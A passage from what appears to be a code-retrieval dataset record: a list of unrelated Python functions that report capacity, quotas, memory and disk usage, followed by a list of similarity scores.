\\\n self._get_used_yard_capacity_based_on_storage_requirement(kwargs)\n\n if used_yard_capacity_over_time:\n used_yard_capacity_sequence = list(used_yard_capacity_over_time.values())\n maximum_used_yard_capacity = max(used_yard_capacity_sequence)\n average_used_yard_capacity = statistics.mean(used_yard_capacity_sequence)\n stddev_used_yard_capacity = statistics.stdev(used_yard_capacity_sequence)\n else:\n maximum_used_yard_capacity = average_used_yard_capacity = 0\n stddev_used_yard_capacity = -1\n\n # create string representation\n report = \"\\n\"\n report += \"storage requirement = \" + self._get_storage_requirement_representation(storage_requirement) + \"\\n\"\n report += \" (reported in TEU)\\n\"\n report += f\"maximum used yard capacity: {maximum_used_yard_capacity:>10.1f}\\n\"\n report += f\"average used yard capacity: {average_used_yard_capacity:>10.1f}\\n\"\n report += f\"standard deviation: {stddev_used_yard_capacity:>10.1f}\\n\"\n 
report += \"(rounding errors might exist)\\n\"\n return report", "def nice(self):\n print(self.getName(), \":\", self.getLen())", "def get_usage(self):\n return self.box_usage", "def test_read_cluster_resource_quota(self):\n pass", "def print_me(self, tabs=0, tab=' '):\n pre = tab*tabs\n print(pre+'Producer:')\n print(pre+' produces:', self._produces)\n print(pre+' consumes:', self._consumes)\n print(pre+' transfer:', self._transfer)\n print(pre+' capacity:', self._capacity)", "def test_project_allocation_scale_precision(self):\n all_timecards = client().get(\n reverse('TimecardList'),\n kwargs={'date': '2021-09-01'}).data\n\n full_allocation_timecard = all_timecards[0]\n three_quarter_allocation_timecard = all_timecards[1]\n half_allocation_timecard = all_timecards[2]\n one_quarter_allocation_timecard = all_timecards[3]\n one_eighth_allocation_timecard = all_timecards[4]\n\n self.assertEqual(full_allocation_timecard['project_allocation'], \"1.000\")\n self.assertEqual(three_quarter_allocation_timecard['project_allocation'], \"0.750\")\n self.assertEqual(half_allocation_timecard['project_allocation'], \"0.500\")\n self.assertEqual(one_quarter_allocation_timecard['project_allocation'], \"0.250\")\n self.assertEqual(one_eighth_allocation_timecard['project_allocation'], \"0.125\")", "def get_logdb_quota():\n query = {\n \"type\": \"op\",\n \"cmd\": \"<show><system><logdb-quota></logdb-quota></system></show>\",\n }\n\n return __proxy__[\"panos.call\"](query)", "def prog(log=False):\n s = os.statvfs('//')\n sectorSize=s[0]\n sectorTotal=s[2]\n sectorFree=s[3]\n percentage = '{0:.2f} %'.format(sectorFree/sectorTotal*100)\n if (log):\n print('■ Micropython FLASH')\n print(' Sector : {0} Bytes'.format(s[0]))\n print(' Total : {0} Sectors, {1:.4f} MB'.format(s[2],sectorSize*sectorTotal/1048576))\n print(' Free : {0} Sectors, {1:.4f} MB'.format(s[3],sectorSize*sectorFree/1048576))\n print(' Free % : {0}'.format(percentage))\n print()\n return sectorSize*sectorFree", "def disk():\n run(env.disk_usage_command % env)", "def test_create_cluster_resource_quota(self):\n pass", "def total_sdram_requirements(self):", "def tablespace_abs(self, name):\n sql = '''SELECT tablespace_name \"TABLESPACE\", \n round((tablespace_size - used_space) * 8192, 2) \"BYTES\" \n FROM dba_tablespace_usage_metrics \n WHERE tablespace_name = '{0}' '''.format(name)\n self.cur.execute(sql)\n res = self.cur.fetchall()\n for i in res:\n print(i[1])", "def get_capacity():\n fs.get_capacity()", "def print_heap(self):\n print self.queue[:self.size:]", "def print_progress(self):\n print(\n '\\rE {} S {} TR {:6.2f} G {:6.2f} Loss {:6.5f} AvgQ {:6.2f}'\n ' MinR {:6.2f} MaxR {:6.2f}'.format(\n self.episode, self.episode_step,\n self.tracker.total_reward, self.tracker.discounted_rewards,\n self.loss_val, self.total_max_q / self.episode_step,\n self.tracker.min_reward, self.tracker.max_reward,\n end=\"\"))", "def __str__(self):\n result = \"\"\n for i in range(len(self.__buckets)):\n result += \"Bucket \" + str(i) + \": \" + str(len(self.__buckets[i])) + \":\"\n result += str(self.__buckets[i]) + \"\\n\"\n return result", "def print_distribution(genome_amounts):\n\t\tassert isinstance(genome_amounts, list)\n\t\tcounter = Counter(genome_amounts)\n\t\ttext = \"{sep}\".join([\"{}: {}\".format(counter[k], k) for k in counter]).format(sep=os.linesep)\n\t\tprint(\"{sep}Using {genoms} original genomes.{sep}<#genomes>: <#strains>{sep}{counter}\".format(\n\t\t\tgenoms=len(genome_amounts), counter=text, sep=os.linesep))", "def usage_quota(self) -> 
Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"usage_quota\")", "def get_used_capacity(self,tot=\"50\"):\n data=self.at_cmd(\"CPMS?\")\n index=data[1].find(tot)-1\n if data[1][index-1]==',':\n return data[index]\n else:\n return data[1][index-1:index]", "def print_max_sizes(self):\n print(\"max_sizes: %s\" % self.max_sizes)", "def mem_info(self):\n\t\t\tavailable, total = cuda.mem_get_info() #Note: pycuda._driver.LogicError: cuMemGetInfo failed: context is destroyed\n\t\t\tprint(\"Available: %.2f GB\\nTotal: %.2f GB\"%(available/1e9, total/1e9))", "def current_capacity_range(self):\n done, data = self._request('GC')\n if done:\n return int(data[0]), int(data[1])\n\n raise EvseError", "def test_list_namespaced_applied_cluster_resource_quota(self):\n pass", "def print_data():\n print \"quantity1.value %f\" % 10.0\n return 0", "def print_self(self):\n #print(f\"\\nself: \\nN: {self.N} \\nQ: {self.Q} \\npi: {self.pi}\"); \n s = ''\n s += f'N: {self.N}, \\n'\n s += f'Q: {self.Q:.2f}, \\n'\n s += f'U: {self.U:2.3f}\\n'\n s += f'policy: ' + ' '.join(f\"{x:2.3f}\" for x in self.pi)\n print(s)\n self.env.render()", "def get_send_quota(self):\r\n return self._make_request('GetSendQuota')", "def get_cgts_vg_free_space():\n\n try:\n # Determine space in cgts-vg in GiB\n vg_free_str = subprocess.check_output( # pylint: disable=not-callable\n ['vgdisplay', '-C', '--noheadings', '--nosuffix',\n '-o', 'vg_free', '--units', 'g', 'cgts-vg'],\n close_fds=True, universal_newlines=True).rstrip()\n cgts_vg_free = int(float(vg_free_str))\n except subprocess.CalledProcessError:\n LOG.error(\"Command vgdisplay failed\")\n raise Exception(\"Command vgdisplay failed\")\n\n return cgts_vg_free", "def ufree(verbose=False):\n import gc\n import os\n F = gc.mem_free()\n A = gc.mem_alloc()\n T = F+A\n P = '{0:.2f}%'.format(F/T*100)\n if not verbose:\n return P\n return ('Total: {} Free: {} ({})'.format(T ,F, P))", "def get_printable_size(self):\n size = self.size\n prefix = ''\n for (s, l) in [(1024*1024*1024, 'GB'), (1024*1024, 'MB'), (1024, 'KB')]:\n if (size>s):\n size = float(size)/s\n prefix = l\n\n return '%10.2f %s' % (size, prefix)", "def zfs_quota(jzfs_path, jquota):\n if jquota == 'none':\n os.system(\"zfs set quota=%s %s\" % (jquota, jzfs_path))\n else:\n# check if zfs set quota is correct\n if os.WEXITSTATUS(os.system(\"zfs set quota=%s %s\" % (jquota, jzfs_path))) != 0:\n print \" \"\n print \" WARNING: Incorrect zfs quota!\"\n else:\n return False", "def view_budgets(self) -> None:\n Menu.prompt_view_budgets()\n for budget in self.user.budget_manager:\n print(f\"{budget}\\n\")", "def assignTaskQuotasGet(self, request, context, org_params,\n page_name, params, entity, **kwargs):\n\n from soc.modules.ghop.views.models.organization import view as org_view\n \n logic = params['logic']\n program_entity = logic.getFromKeyFieldsOr404(kwargs)\n \n org_params['list_template'] = ('modules/ghop/program/'\n 'allocation/allocation.html')\n org_params['list_heading'] = ('modules/ghop/program/'\n 'allocation/heading.html')\n org_params['list_row'] = 'modules/ghop/program/allocation/row.html'\n org_params['list_pagination'] = 'soc/list/no_pagination.html'\n org_params['list_description'] = self.DEF_TASK_QUOTA_ALLOCATION_MSG\n# TODO(LIST)\n\n return self.list(request, 'any_access', page_name=page_name, params=org_params)", "def print_available( self ):\n\n\t\tmax_length = 0\n\n\t\tfor key in self._available:\n\t\t\tmax_length = max( max_length, len( key ) )\n\n\t\tformat_str = 'API found: %%-%ds (%%s)' % 
max_length\n\n\t\tfor key in self._available:\n\t\t\tentry = self._available.get( key )\n\t\t\tprint( format_str % ( key, entry.get( 'path' ) ) )", "def report_quota_for_vserver(vs_host, dlimits):\n quota_free = 1000 * (dlimits[1] - dlimits[0])\n quota_used = 1000 * dlimits[0]\n submit_vserver_quota(vs_host, 'quota', [quota_used, quota_free])", "def ram(log=False):\n gc.collect()\n freeRam = gc.mem_free()\n allocatedRam = gc.mem_alloc()\n totalRam = freeRam+allocatedRam\n percentage = '{0:.2f} %'.format(freeRam/totalRam*100)\n if (log):\n print('■ Micropython RAM')\n print(' Total : {0:.2f} KB'.format(totalRam/1024))\n print(' Free : {0:.2f} KB'.format(freeRam/1024))\n print(' Free % : {0}'.format(percentage))\n print()\n return freeRam", "def __str__(self):\n return \"{}, {}km on current fare, ${:.2f}/km\".format(super().__str__(),\n self.current_fare_distance,\n self.price_per_km)", "def __repr__(self) -> str:\n return \"capacity of hash: {}, current size of hash: {}\".format(\n self.capacity, self.length\n )", "def capacity(self):\n return str(int(self._properties.get('capacity')) * 1073741824)", "def usage_metrics(self) -> Sequence['outputs.GetServiceQuotaUsageMetricResult']:\n return pulumi.get(self, \"usage_metrics\")", "def test_replace_cluster_resource_quota(self):\n pass", "def display(self):\n print(\n f'\\t\\t {self.name.upper()} {self.potency[0]}{self.potency[1]}\\t\\t'\n f' {self.dose_qty[0]} {self.dose_qty[1]} {self.dose[0]} {self.dose[1].upper()}')", "def gather_info_and_display():\n # Obtain total rss displayed in memory.stat for each group,\n # container and service.\n try:\n output_mem = pipe_command(GREP_CMD, AWK_CMD, cwd=MEMPATH)\n LOG.debug(\n 'command: %s\\n%s',\n \"grep -rs total_rss '/sys/fs/cgroup/memory/' \"\n \"| awk '$2>0{print$0}' \",\n output_mem)\n except subprocess.CalledProcessError as error:\n LOG.error('Could not get total_rss memory, error=%s', error)\n return 1\n\n mem_info = get_meminfo()\n pt_groups = gather_groups_memory(output_mem)\n pt_cont = gather_containers_memory(output_mem)\n pt_serv = sys_service_memory()\n\n # Dump the tables out\n print('\\nPer groups memory usage:')\n\n # Get string to be printed and create list of elements separated by \\n\n list_of_table_lines = pt_groups.get_string().split('\\n')\n\n # Use the first line (+---+-- ...) 
as horizontal rule to insert later\n horizontal_line = list_of_table_lines[0]\n\n # Print the table, except last two lines ( \"Total\" row + final separator).\n print(\"\\n\".join(list_of_table_lines[:-2]))\n # Print separator, and finally the \"Total\" row.\n print(horizontal_line)\n print(\"\\n\".join(list_of_table_lines[-2:]))\n\n pt_namespc = prettytable.PrettyTable(\n ['Namespace',\n 'Resident Set Size (MiB)',\n ], caching=False)\n pt_namespc.align = 'l'\n pt_namespc.align['Resident Set Size (MiB)'] = 'r'\n\n print('\\nPer namespace memory usage:')\n for n_s in MEMORY['namespaces']:\n pt_namespc.add_row(\n [n_s,\n MEMORY['namespaces'][n_s],\n ])\n print(pt_namespc)\n\n print('\\nPer container memory usage:')\n print(pt_cont)\n\n print('\\nPer service memory usage:')\n print(pt_serv)\n\n base_mebib = 0.0\n k8s_system = 0.0\n k8s_addon = 0.0\n platform_memory_percent = 0.0\n\n # Calculate base memory usage (i.e., normal memory, exclude K8S and VMs)\n # e.g., docker, system.slice, user.slice\n for group in MEMORY['cgroups']:\n if group in BASE_GROUPS:\n base_mebib += float(MEMORY['cgroups'][group])\n\n # K8S platform system usage (essential) and addons usage (non-essential)\n for n_s in MEMORY['namespaces']:\n if n_s in K8S_NAMESPACE_SYSTEM:\n k8s_system += MEMORY['namespaces'][n_s]\n elif n_s in K8S_NAMESPACE_ADDON:\n k8s_addon += MEMORY['namespaces'][n_s]\n\n # Calculate platform memory usage\n platform_mebib = base_mebib + k8s_system\n\n anon_mebib = float(mem_to_mebibytes(\n mem_info['Active(anon)'] + mem_info['Inactive(anon)'])) * KBYTE\n avail_mebib = float(mem_to_mebibytes(\n mem_info['MemAvailable'])) * KBYTE\n total_mebib = float(anon_mebib + avail_mebib)\n\n anon_percent = py2_round(100 * anon_mebib / total_mebib, DECIMAL_DIGITS) # pylint: disable=W1619\n\n reserved_mebib = get_platform_reserved_memory()\n # Calculate platform memory in terms of percent reserved\n if reserved_mebib > 0.0:\n platform_memory_percent = py2_round(\n 100 * platform_mebib / reserved_mebib, DECIMAL_DIGITS) # pylint: disable=W1619\n\n pt_platf = prettytable.PrettyTable(\n ['Reserved',\n 'Platform',\n 'Base',\n 'K8s Platform system',\n 'k8s-addon'\n ], caching=False)\n pt_platf.align = 'l'\n\n pt_platf.add_row(\n [reserved_mebib,\n '{} ({}%)'.format(platform_mebib, platform_memory_percent),\n base_mebib,\n k8s_system,\n k8s_addon\n ])\n print('\\nPlatform memory usage in MiB:')\n print(pt_platf)\n\n pt_4k = prettytable.PrettyTable(\n ['Anon',\n 'Cgroup-rss',\n 'Available',\n 'Total'\n ], caching=False)\n pt_4k.align = 'l'\n\n pt_4k.add_row(\n ['{} ({}%)'.format(anon_mebib, anon_percent),\n MEMORY['cgroups']['total_rss'],\n avail_mebib,\n total_mebib\n ])\n\n print('\\n4K memory usage in MiB:')\n print(pt_4k)\n\n return 0", "def get_usage(self):\n res = self.conn.get_send_quota()\n res = res['GetSendQuotaResponse']\n result = res['GetSendQuotaResult']\n quota = float(result['Max24HourSend'])\n sent = float(result['SentLast24Hours'])\n return sent, quota", "def value_printer():#todo: add all wanted items\n print(\"Max ascent speed = \"+ max_ascent_speed() + \" m/s\")\n print(\"Max ascent acceleration = \" + ascent_acc() + \" m/s^2\")\n print(\"Max ascent acceleration = \" + descent_acc() + \" m/s^2\")\n print(\"Max acceleration = \" + acc() + \" m/s^2\")", "def get_space(): \n space = {\n 'timesteps_per_batch': hp.choice('timesteps_per_batch', [512, 1024, 2048, 4096, 8192]),\n 'vf_stepsize': hp.loguniform('vf_stepsize', -5, -2),\n 'max_kl' : hp.loguniform('max_kl', -2.5, -0.5),\n 'gamma': 
hp.uniform('gamma', (1-(1/((10**(-1))*4))), (1-(1/((10**(1.5))*4)))), #4:T. Remember to change this if code is altered. -1:T/tau. tau=0.04=dt\n 'lam': hp.uniform('lam', (1-(1/((10**(-1))*4))), (1-(1/((10**(1.5))*4)))) #4:T. Remember to change this if code is altered. -1:T/tau. tau=0.04=dt\n }\n return space", "def ufree_disk():\n import os\n # note: this would work on PyCom devices but not implemented\n fs_stat = os.statvfs('//')\n fs_size = fs_stat[0] * fs_stat[2]\n fs_free = fs_stat[0] * fs_stat[3]\n fs_per = fs_free / fs_size\n return(\"Total: {:,} Free: {:,} ({0:.2f}%)\".format(fs_size, fs_free, fs_per))", "def freespace(self):\n self.log.info(\"freespace\")\n freebytes = shutil.disk_usage(self.s3_dir).free\n self.log.info(\"returning:\" + str(freebytes))\n return freebytes", "def get_num_slots(self):\n # Your code here\n return self.capacity", "def check_disk_space(self, required_disk_space, fs='/opt'):\n\n stats = admin_tasks.df_stats(fs)\n if stats:\n __, __, available = stats\n\n space_left = available - required_disk_space\n\n if space_left > 0.5:\n self.log.info(\"%.1fG of disk space is available from approximately %.1fG in %s\" %\n (required_disk_space, available, fs))\n elif space_left > 0 and space_left <= 0.5:\n self.log.warning(\"Low disk space. Only %.1fG will be free from approximately available space of %.1fG in %s.\" % (\n space_left, available, fs))\n else:\n self.log.error(\"Not enough disk space. %.1fG is not available from approximately avaiable space of %.1fG in %s.\" % (\n required_disk_space, available, fs))\n sys.exit(1)", "def __printProgressBar (self,iteration, total,size,speedd='n', prefix = '', suffix = '', decimals = 1, length = 100, fill = '█'):\n\t\tpercent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n\t\tfilledLength = int(length * iteration // total)\n\t\tsize='%.1f'%size\n\t\tbar = fill * filledLength + '-' * (length - filledLength)\n\t\tprint('\\r(%sMG) |%s| %s%% [%s]kbs size=[%s]MB %s' % (prefix, bar, percent,speedd,size, suffix), end = '\\r')", "def __str__(self):\n outbuffer = []\n outbuffer.append(\"%d keys in dataset\" % len(self.__quantile))\n outbuffer.append(self.head())\n outbuffer.append(\"...\")\n outbuffer.append(self.tail())\n return \"\\n\".join(outbuffer)", "def test_capacity_factor(pudl_out_eia):\n print(\"\\nCalculating generator capacity factors...\")\n cf = pudl_out_eia.capacity_factor()\n print(f\" capacity_factor: {len(cf)} records\")", "def __str__(self):\n result = \"\"\n for i in range(len(self.__buckets)):\n result += \"Bucket \" + str(i) + \": \" + str(self.__buckets[i]) + \"\\n\"\n return result", "def getSpaceUsage(path):\n st = os.statvfs(path)\n \n flash = { \"free\" : st.f_bavail * st.f_frsize, \"used\":(st.f_blocks - st.f_bfree) * st.f_frsize }\n \n #free = st.f_bavail * st.f_frsize\n #total = st.f_blocks * st.f_frsize\n #used = (st.f_blocks - st.f_bfree) * st.f_frsize\n return flash", "def print_account(account):\r\n markets_output = \"\"\r\n for market in account.get_market_segments():\r\n markets_output += market.name.strip(\"\\'\") + \", \"\r\n markets_output = markets_output.strip(\"\\'\")\r\n print(f'{account.name} ({markets_output[:-2]}): {account.get_sales_rep()}')", "def test_rest_v20_dd_systems_systemid_stats_capacity_get(self):\n pass", "def cpu_k_space_fq_allocation(n, sv, mem):\n return int(math.floor(\n float(.8 * mem - 4 * sv * n - 12 * n) / (4 * (3 * sv + 4))\n ))", "def print_header():\n\n def get_dashes(perc):\n dashes = \"|\" * int((float(perc) / 10 * 4))\n 
empty_dashes = \" \" * (40 - len(dashes))\n return dashes, empty_dashes\n\n # cpu usage\n percs = psutil.cpu_percent(interval=0, percpu=True)\n for cpu_num, perc in enumerate(percs):\n dashes, empty_dashes = get_dashes(perc)\n line = (\" CPU%-2s [%s%s] %5s%%\" % (cpu_num, dashes, empty_dashes,\n perc))\n print_line(line)\n\n # cpu usage\n mem = psutil.virtual_memory()\n dashes, empty_dashes = get_dashes(mem.percent)\n line = \" Mem [%s%s] %5s%% %6s / %s\" % (\n dashes, empty_dashes,\n mem.percent,\n str(int(mem.used / 1024 / 1024)) + \"M\",\n str(int(mem.total / 1024 / 1024)) + \"M\"\n )\n print_line(line)\n\n # swap usage\n swap = psutil.swap_memory()\n dashes, empty_dashes = get_dashes(swap.percent)\n line = \" Swap [%s%s] %5s%% %6s / %s\" % (\n dashes, empty_dashes,\n swap.percent,\n str(int(swap.used / 1024 / 1024)) + \"M\",\n str(int(swap.total / 1024 / 1024)) + \"M\"\n )\n print_line(line)", "def log_allocation(self, allocation, resource):\n self.log_file.write(self.TYPE_SUCCESS + \",%f,%s,%f,%f,%f,%f\\n\" %\n (float(allocation.resources[resource]['used']),\n allocation.node,\n float(allocation.utilization),\n float(allocation.offer),\n float(allocation.price),\n float(allocation.unit_price)))" ]
[ "0.6803348", "0.6786766", "0.62010103", "0.60411453", "0.60358113", "0.603348", "0.5993506", "0.58677566", "0.58565897", "0.5847982", "0.5795429", "0.57485247", "0.5704235", "0.5681458", "0.5679012", "0.564224", "0.56345713", "0.56312704", "0.56190854", "0.554365", "0.55390847", "0.55081373", "0.54874927", "0.54707724", "0.5461569", "0.5441486", "0.54362214", "0.5429559", "0.5403241", "0.53922236", "0.53888613", "0.5375704", "0.53727657", "0.5359334", "0.53590983", "0.53507644", "0.533257", "0.5318734", "0.53069425", "0.5304192", "0.5303645", "0.5300067", "0.5292556", "0.5292322", "0.52784276", "0.5265859", "0.5262544", "0.525921", "0.52470624", "0.52437526", "0.5239561", "0.5234352", "0.5216176", "0.5205941", "0.51835936", "0.51793486", "0.51740205", "0.5171844", "0.5162029", "0.515867", "0.5151075", "0.5150676", "0.5147505", "0.51450455", "0.51353055", "0.51325214", "0.51318204", "0.51243985", "0.5113366", "0.51126075", "0.509887", "0.5096122", "0.5089727", "0.5086241", "0.5080108", "0.5065954", "0.5065555", "0.506313", "0.5058623", "0.50486326", "0.5048169", "0.50473857", "0.50440055", "0.5043608", "0.5029822", "0.50286436", "0.50164896", "0.50102925", "0.50079536", "0.50069284", "0.5003988", "0.49987933", "0.49976602", "0.49958903", "0.49958497", "0.49935088", "0.49909848", "0.4986983", "0.4973301", "0.49729565" ]
0.6106883
3